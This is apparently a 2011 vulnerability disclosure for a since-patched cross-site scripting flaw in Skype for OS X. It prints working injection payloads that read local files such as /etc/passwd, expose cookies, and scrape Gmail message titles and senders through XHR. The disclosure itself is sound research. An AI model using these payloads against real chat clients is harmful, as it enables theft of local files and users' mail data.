Skype OS X Cross-Site Scripting Vulnerability
Posted by Kos on 06/18/2011 at 9:06 pm | Last modified: 11/08/2011 6:06 pmVulnerability: Cross Site Scripting
Affects: Skype 5.0.x to <= 5.0.914 (OS X) (Download | Local Mirror)
Skype (http://skype.com/) was vulnerable to (persistent?) XSS via messages from other users.
On top of that, the DOM of this window does not contain a set Origin, so it is possible to "bypass" the cross origin policy.
Authentication Status: Logged into skype, but persists in logs,
so a user can be exploited again if viewing logs. Default privacy
settings require a user to add the attacker as a contact.
so a user can be exploited again if viewing logs. Default privacy
settings require a user to add the attacker as a contact.
Attribution:
- April 6th, 2011 – Andrew van der Stock (@vanderaj). Originally discovered and disclosed to Skype.
- May 7th, 2011 – Skype IM (MAC OS X) – Is this the 0day ?
Inject used in attack
http://kos.io/"><script>alert(1)</script>
More advanced attacks:
Create an iFrame to Google.com within the Skype chat DOM. Write to that
iFrame's DOM.
http://kos.io/"><script>try{alert(document.getElementsByClassName("body")[0].innerHTML="<div\40style='height:200px;'><iframe\40src='http://www.google.com/'\40onload='hax.document.body.innerHTML=\42<img\40src=z\40onerror=\\\42alert(document.domain+document.cookie)\\\42>\42'\40id='hax'></iframe><div>")}catch(e){alert(e)}</script>
Create an XHR request to pull /etc/hosts
http://kos.io/"><script>x=new/**/XMLHttpRequest;x.open('get','file:///etc/passwd');x.send();x.onreadystatechange=function(){if(x.readyState==4)alert(x.responseText)}</script>
Create an XHR request to pull mobile mail.google.com, then run regex on the page & pull out email titles & from. (Terrible terrible regex.)
http://kos.io/"><script>var/**/list='';var/**/winning='';x=new/**/XMLHttpRequest();x.open('get','https://mail.google.com/mail/u/0/x/asd');x.send();x.onreadystatechange=function(){if(x.readyState==4){list=x.responseText.match(/<div.class=.msgrd.>\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n.*\n<\/div>/g);for(i/**/in/**/list){winning=winning+list[i].match(/msgrd.>\n(.*)\n<br..>/)[1]+"\40||\40"+list[i].match(/[a-z0-9]{13}.>\n(.*)<\/a>/)[1]+'\n';}alert(winning)}}</script>
Resolution: May 6th, 2011 –
Skype fixed this in their 5.0.922 update. (Released April 14th, 2011)
Update: After a friend went over the documentation that hooks webkit into applications, he found this snippet. I was wrong in saying there was a null origin, it's just expicitly set to allow * :
"""
Once you have obtained the Window object for the target document, you can send it a message with the following code:
windowObj.postMessage('test message', 'http://example.com');
The first parameter is an arbitrary message.
The second parameter is the target origin value. An origin value is just a URL with the path part removed. For example, the origin of a local file is file://. By specifying a target origin, you are saying that that your message should only be delivered if the target window's current contents came from that origin.
Although you may specify an asterisk (*) wildcard for the target origin (to allow the message to be sent
regardless of where the contents of the target window came from), you should do so only if you are certain that
it would not be harmful if your message were received by content originating from a different website.
"""
No comments posted.